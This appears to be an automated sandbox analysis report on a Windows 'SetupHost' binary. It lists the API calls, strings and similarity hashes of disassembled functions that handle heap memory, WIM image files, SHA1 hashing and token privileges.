                                                                                                                        • Instruction Fuzzy Hash: 46C092B224420CBFA7111A61AC09DB77F5DD7A8711B008022BF08C5422DA719D21F5B4
                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00542383
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        • Opcode ID: 26ef1c7d7cd4e41859e315cd7bddae0d38d22f918362cee7aab58f1992a52bee
                                                                                                                        • Instruction ID: 8db03b9b9489d344bfd535091f37e0a3b5eba6aacef73d231e5c50e896016c8d
                                                                                                                        • Opcode Fuzzy Hash: 26ef1c7d7cd4e41859e315cd7bddae0d38d22f918362cee7aab58f1992a52bee
                                                                                                                        • Instruction Fuzzy Hash: 32C0023604424DBBCF125F81EC05F9A3F2AEB98761F148411FA19154718772D971FB55
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1452528299-0
                                                                                                                        • Opcode ID: a7d70fdaf04f4a22fccd7cf9b02c25e8f69dbf31de9d21cef793697f672c069c
                                                                                                                        • Instruction ID: 464edc4456b000cef1a04d363cfc9e94180915183064fc9b642c8a749fa68485
                                                                                                                        • Opcode Fuzzy Hash: a7d70fdaf04f4a22fccd7cf9b02c25e8f69dbf31de9d21cef793697f672c069c
                                                                                                                        • Instruction Fuzzy Hash: 82119D71204718AFDB154F38EC1AB6E3FA9FB98762F104A15F411DB2E0DAB19C05AB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FF934: towupper.MSVCRT ref: 004FF988
                                                                                                                          • Part of subcall function 004FF934: towupper.MSVCRT ref: 004FF999
                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 0052B186
                                                                                                                        • NtCreateFile.NTDLL ref: 0052B1DC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000028), ref: 0052B1ED
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0052B1F4
                                                                                                                        • NtQueryInformationFile.NTDLL ref: 0052B208
                                                                                                                        • wcsncmp.MSVCRT ref: 0052B22C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0052B23F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0052B246
                                                                                                                        • NtClose.NTDLL ref: 0052B24F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0052B262
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0052B269
                                                                                                                        • NtClose.NTDLL ref: 0052B272
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,00000000,00523E82,?,?,?,?,?,?,00000001,?,00000000), ref: 0052B2A4
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00000001,?,00000000), ref: 0052B2AB
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000001,?,00000000), ref: 0052B2B9
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000001,?,00000000), ref: 0052B2CF
                                                                                                                        • NtSetInformationFile.NTDLL ref: 0052B320
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000001,?,00000000), ref: 0052B335
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,00000000), ref: 0052B33C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$FileFree$AllocCloseErrorInformationLastPathtowupper$CreateNameName_Querywcsncmp
                                                                                                                        • String ID: @$WIMSetFileShortName$\Program Files\WindowsApps\$\Windows\WinSxS\
                                                                                                                        • API String ID: 2294239984-2754016081
                                                                                                                        • Opcode ID: e84bdff0d49b13c81ea75a887cf0a8808fbd4711a1527467b1eaad57b47748ba
                                                                                                                        • Instruction ID: 45325267ca18aff1c6d84b37c92054370769e253447597557701da22bc9b3c27
                                                                                                                        • Opcode Fuzzy Hash: e84bdff0d49b13c81ea75a887cf0a8808fbd4711a1527467b1eaad57b47748ba
                                                                                                                        • Instruction Fuzzy Hash: 7971C575A00329EBEB109FA4AC58BBF7FB9BF59701F144529E905E7290E7309E049B90
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(0053F3E0,00000000,005427A0,WdsSetupLogInit,00540374), ref: 0054013F
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0054014F
                                                                                                                        • TlsFree.KERNEL32 ref: 00540161
                                                                                                                        • TlsGetValue.KERNEL32 ref: 00540174
                                                                                                                        • TlsFree.KERNEL32 ref: 005401A2
                                                                                                                        • EnterCriticalSection.KERNEL32(005566F8), ref: 005401B4
                                                                                                                        • GetProcessHeap.KERNEL32(00000000), ref: 005401D8
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005401DF
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,08C30AB0), ref: 005401F7
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005401FE
                                                                                                                        • LeaveCriticalSection.KERNEL32(005566F8), ref: 0054021B
                                                                                                                          • Part of subcall function 00540241: GetProcessHeap.KERNEL32(00000000,00000008,?,00540189), ref: 0054029E
                                                                                                                          • Part of subcall function 00540241: HeapFree.KERNEL32(00000000,?,00540189), ref: 005402A5
                                                                                                                          • Part of subcall function 00540241: GetProcessHeap.KERNEL32(00000000,00000000,?,00540189), ref: 005402B5
                                                                                                                          • Part of subcall function 00540241: HeapFree.KERNEL32(00000000,?,00540189), ref: 005402BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Free$Process$CriticalExceptionFilterSectionUnhandled$EnterLeaveValue
                                                                                                                        • String ID: WdsSetupLogInit$T
                                                                                                                        • API String ID: 2436732932-273790995
                                                                                                                        • Opcode ID: 4df1eda30751ac33a6d6c4cda26d971210cc0db772572aafbd066d7af760832d
                                                                                                                        • Instruction ID: aa0f482e21912162a1032a7d11c41cc38bdebb91e58381de51e1c20f2a257e78
                                                                                                                        • Opcode Fuzzy Hash: 4df1eda30751ac33a6d6c4cda26d971210cc0db772572aafbd066d7af760832d
                                                                                                                        • Instruction Fuzzy Hash: B8316B796063829BC7115F74FCAA95A3F6DFB787573541128F906932E0CB719C48EB10
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0051D224
                                                                                                                          • Part of subcall function 00520504: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0051DF5C,00000000,00000000,00000000,?,00000000,00000000,0051E358), ref: 0052053D
                                                                                                                          • Part of subcall function 00520504: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00550D5A,000000FF), ref: 0052056E
                                                                                                                          • Part of subcall function 00520504: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00550D5A,000000FF), ref: 00520575
                                                                                                                          • Part of subcall function 00520504: GetFullPathNameW.KERNEL32(?,-00000003,00000000,?), ref: 005205AE
                                                                                                                          • Part of subcall function 00520504: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00550D5A,000000FF), ref: 005205EF
                                                                                                                          • Part of subcall function 00520504: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00550D5A,000000FF), ref: 005205F6
                                                                                                                          • Part of subcall function 00520504: SetLastError.KERNEL32(00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 00520640
                                                                                                                        • GetLastError.KERNEL32(?), ref: 0051D242
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0051D6D6
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0051D6DD
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0051D6E4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ErrorLast$Process$FreeFullNamePath$Alloc
                                                                                                                        • String ID: Fail to read WIM header$WIMCreateFile
                                                                                                                        • API String ID: 1537709336-3419363894
                                                                                                                        • Opcode ID: 3f730c951b8e58278faee8ca24fd11fcab5a0ee39624151f3c5a7145fc2e3dab
                                                                                                                        • Instruction ID: e13b4baae0b9a50858b5170747a7541230c57bf3b20af5e9c66351d6fa3bebc0
                                                                                                                        • Opcode Fuzzy Hash: 3f730c951b8e58278faee8ca24fd11fcab5a0ee39624151f3c5a7145fc2e3dab
                                                                                                                        • Instruction Fuzzy Hash: A0D1C5347007129BEB14AB759899BBE7EB2BFD5300F094828E5598B2D2DF74CC81DB61
                                                                                                                        APIs
                                                                                                                        • __allrem.LIBCMT ref: 0052C17A
                                                                                                                        • SetLastError.KERNEL32(000004D3,?,?,?,?,XQ,00A00000,00000000,00000000,?,00000001), ref: 0052C1A1
                                                                                                                        • BCryptHashData.BCRYPT(?,00523894,?,00000000,?,00000000,00000000,00000000,?,00000001), ref: 0052C206
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000001), ref: 0052C217
                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00000001), ref: 0052C246
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CryptDataHash__allrem
                                                                                                                        • String ID: XQ$XQ
                                                                                                                        • API String ID: 4038014144-2849533878
                                                                                                                        • Opcode ID: 01e2ed101ba917ce1b3f925ed6c4473c4f10e23a2ed7f32b4f515ebc472848a4
                                                                                                                        • Instruction ID: f754055df9dc0fff2b8d70c9bba9e7770741f98387aeb5ac63f8e14c72d76c56
                                                                                                                        • Opcode Fuzzy Hash: 01e2ed101ba917ce1b3f925ed6c4473c4f10e23a2ed7f32b4f515ebc472848a4
                                                                                                                        • Instruction Fuzzy Hash: 0E415F75E0021AABDF14CF98E881BAEBFB5BF99711F204129E901A3385DB709D01CB90
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap$_wcsicmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3839862788-0
                                                                                                                        • Opcode ID: c22002e4d3ceda7bb932d1e6027293db74770097d7bb7e505128033cb66c5d29
                                                                                                                        • Instruction ID: 5d8472b4cc04c74f2a338895ad22e687a19d0a6b8fb5832e4a1515e0af666143
                                                                                                                        • Opcode Fuzzy Hash: c22002e4d3ceda7bb932d1e6027293db74770097d7bb7e505128033cb66c5d29
                                                                                                                        • Instruction Fuzzy Hash: C39157729087529FC722CF69C888B5FBBE8BF98754F01092DF98597290D774DD048B92
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000010,?,?,00000000,?,?,?,?,0050166A,00000000,?,00000014,00000000,00000000), ref: 00501487
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,?,?,?,0050166A,00000000,?,00000014,00000000,00000000,?,WIM\IMAGE[*]), ref: 0050148E
                                                                                                                        • RtlFreeHeap.NTDLL ref: 0050152C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,0050166A,00000000,?,00000014,00000000,00000000), ref: 00501539
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,0050166A,00000000,?,00000014,00000000,00000000,?,WIM\IMAGE[*]), ref: 00501540
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2768201423-0
                                                                                                                        • Opcode ID: 5d3349beca63afdbfa412bb8ad51bcee79ebf636a4466ab6da99a16b21899e8f
                                                                                                                        • Instruction ID: 77dea098d1bd507acc0c614829539471a635fff1fe6ffbf3a75ae1e61cd5933a
                                                                                                                        • Opcode Fuzzy Hash: 5d3349beca63afdbfa412bb8ad51bcee79ebf636a4466ab6da99a16b21899e8f
                                                                                                                        • Instruction Fuzzy Hash: F1317476900609AFCB11DFA8C884A9EBBF9FF88751F154469EA05EB350D730DE058F91
                                                                                                                        APIs
                                                                                                                        • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00000001), ref: 005211F3
                                                                                                                        • NtQueryInformationFile.NTDLL ref: 00521240
                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 00521259
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00521260
                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,?), ref: 0052128A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$ErrorInformation$HandleLastQueryStatusWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 133596512-0
                                                                                                                        • Opcode ID: eb2e0193eb16400a2ba11c11f8e21bb4061f8b30b25c7f64dce653abaa07eb97
                                                                                                                        • Instruction ID: 433699224612c56107d34f8a0c092cb9d80f550714898285e0f7f29a5931ccbd
                                                                                                                        • Opcode Fuzzy Hash: eb2e0193eb16400a2ba11c11f8e21bb4061f8b30b25c7f64dce653abaa07eb97
                                                                                                                        • Instruction Fuzzy Hash: FE21E67AA04629DBCB288BA5EC549AFBFB8FF59711F10452DF803D7180DA3098018754
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,005007A0,?), ref: 00501209
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,005007A0,?,?,00000000,00000000,00000000), ref: 00501210
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?), ref: 00501249
                                                                                                                        • GetLastError.KERNEL32 ref: 00501253
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00501278
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastOpenPrivileges
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2672816888-0
                                                                                                                        • Opcode ID: 0ed695cf042ce6f014fb84f5857d5cd6cdcc69a20d1252898c417586831ed038
                                                                                                                        • Instruction ID: 7d4eb01d575d433a0d85218d0da9c4fdedd75cfa23ae11201f5994cf620d77ea
                                                                                                                        • Opcode Fuzzy Hash: 0ed695cf042ce6f014fb84f5857d5cd6cdcc69a20d1252898c417586831ed038
                                                                                                                        • Instruction Fuzzy Hash: 16214A72A0060EABCB00CFA9EC49AEFBFB8FB58755F104029E511E6290D7309945CB61
                                                                                                                        APIs
                                                                                                                        • HeapAlloc.KERNEL32(?,00000000), ref: 0051A1C7
                                                                                                                          • Part of subcall function 0051B3AC: DbgPrintEx.NTDLL ref: 0051B3F2
                                                                                                                          • Part of subcall function 0051B3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 0051B400
                                                                                                                        Strings
                                                                                                                        • *ppvAlloc = RtlAllocateHeap((((PPEB)__readfsdword(((LONG)(LONG_PTR)&(((TEB *)0)->ProcessEnvironmentBlock))))->ProcessHeap), 0, cb), xrefs: 0051A1F1
                                                                                                                        • onecore\base\xml\udom_xmlwalker.h, xrefs: 0051A1D8
                                                                                                                        • $FM, xrefs: 0051A1E0
                                                                                                                        • CXmlCursor::XmlAlloc, xrefs: 0051A1E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocHeapPrintRaiseStatus
                                                                                                                        • String ID: $FM$*ppvAlloc = RtlAllocateHeap((((PPEB)__readfsdword(((LONG)(LONG_PTR)&(((TEB *)0)->ProcessEnvironmentBlock))))->ProcessHeap), 0, cb)$CXmlCursor::XmlAlloc$onecore\base\xml\udom_xmlwalker.h
                                                                                                                        • API String ID: 3415175580-136596860
                                                                                                                        • Opcode ID: 95284f436a336ccf174c9e814a8a94b3a91639f7f67b5c6b3bafc39462dcd28a
                                                                                                                        • Instruction ID: 5983a754e8f9b725e7306df3c2ac277679488bbb8ccf70be939982a3483cf0e6
                                                                                                                        • Opcode Fuzzy Hash: 95284f436a336ccf174c9e814a8a94b3a91639f7f67b5c6b3bafc39462dcd28a
                                                                                                                        • Instruction Fuzzy Hash: C2F0A7B5901315AFE7119F689C18A9EBFF8FB95308F108459E821A7300E779D904CB98
                                                                                                                        APIs
                                                                                                                        • BCryptFinishHash.BCRYPT(?,XQ,00000014,00000000,XQ,0052C23E,00000000,?,00000001), ref: 0051C3D0
                                                                                                                        • BCryptDestroyHash.BCRYPT(?,XQ,0052C23E,00000000,?,00000001), ref: 0051C3E3
                                                                                                                        • LocalFree.KERNEL32(?), ref: 0051C3F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CryptHash$DestroyFinishFreeLocal
                                                                                                                        • String ID: XQ
                                                                                                                        • API String ID: 2199310115-3277335235
                                                                                                                        • Opcode ID: b2f6f1753458e6ca05336ca7cd6627abc133198342335af18a871f7b4b388717
                                                                                                                        • Instruction ID: 41855ccb48cc190498f20c475dc118b158ac0a4ce3ac50af861d4142e5649e86
                                                                                                                        • Opcode Fuzzy Hash: b2f6f1753458e6ca05336ca7cd6627abc133198342335af18a871f7b4b388717
                                                                                                                        • Instruction Fuzzy Hash: 40E0ED35284205DBE7311F15FC08B657FF5BF59716F244859F5909A0B0DBB15C84EE04
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                         • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                         • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: FreeHeap$_wcsicmp
• String ID:
• API String ID: 3839862788-0
• Opcode ID: 79a4b7340c4c99d81bb334aa16df37035a3e9dfb564729fc0e93c44daf387a08
• Instruction ID: 260096812a8426043f59399451c923f9b3ab6dfd11767fb42354cb1c63263510
• Opcode Fuzzy Hash: 79a4b7340c4c99d81bb334aa16df37035a3e9dfb564729fc0e93c44daf387a08
• Instruction Fuzzy Hash: 719138B1A0061A9FCF05DFE9D994AAEBBB5FF48304F504029FA01AB291DB71AD05CF50
APIs
• BCryptOpenAlgorithmProvider.BCRYPT(?,SHA1,00000000,00000000,?,?,?,?,0051C4E3,?,?,XQ,0052C13B,00000000,?,00000001), ref: 0051C425
• BCryptCloseAlgorithmProvider.BCRYPT(?,00000000,?,0051C4E3,?,?,XQ,0052C13B,00000000,?,00000001), ref: 0051C44A
Strings
Similarity
• API ID: AlgorithmCryptProvider$CloseOpen
• String ID: SHA1
• API String ID: 58216706-1053416790
• Opcode ID: 38cf845984b02914c67f73a2bd0610447b1a8495f8044d8417a825dd756541b2
• Instruction ID: d40dbee1bf9f3f47ca5344d18df079d707faa1b032de4c941052d5c8d720ea27
• Opcode Fuzzy Hash: 38cf845984b02914c67f73a2bd0610447b1a8495f8044d8417a825dd756541b2
• Instruction Fuzzy Hash: EDF0A470601218EBDB11CF65EC249ABBFB8FF59356B4040AAF401D3240CB70A985D694
APIs
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 361c6e407359cd8e475902a4cd8ed53aceaee9df1515d1382727141e2b024d52
• Instruction ID: af187b3d7bb154eeec892398298a197c124a7c46361e000ab350f41371bc4661
• Opcode Fuzzy Hash: 361c6e407359cd8e475902a4cd8ed53aceaee9df1515d1382727141e2b024d52
• Instruction Fuzzy Hash: 65E0B632511A909BC7358F0AE908E47BBE9EBD4B11B05846EA06A83960C6749845CA50
APIs
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 295da18b28b7c9f9a0f145859082267e915d12c65d50a3bebfc35be70698cb31
• Instruction ID: d2b73cb38978cccf34ebcf07a4091af431d6029be468389d4dd3486cbb366a2a
• Opcode Fuzzy Hash: 295da18b28b7c9f9a0f145859082267e915d12c65d50a3bebfc35be70698cb31
• Instruction Fuzzy Hash: 6FD05E32050750DFD3314F05E808B427BF1FB64711F25095DE441469B1D7B89C89DBC4
APIs
• HeapAlloc.KERNEL32(?,00000000,?,?,?,?,00508B2D,?), ref: 0050D2AE
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
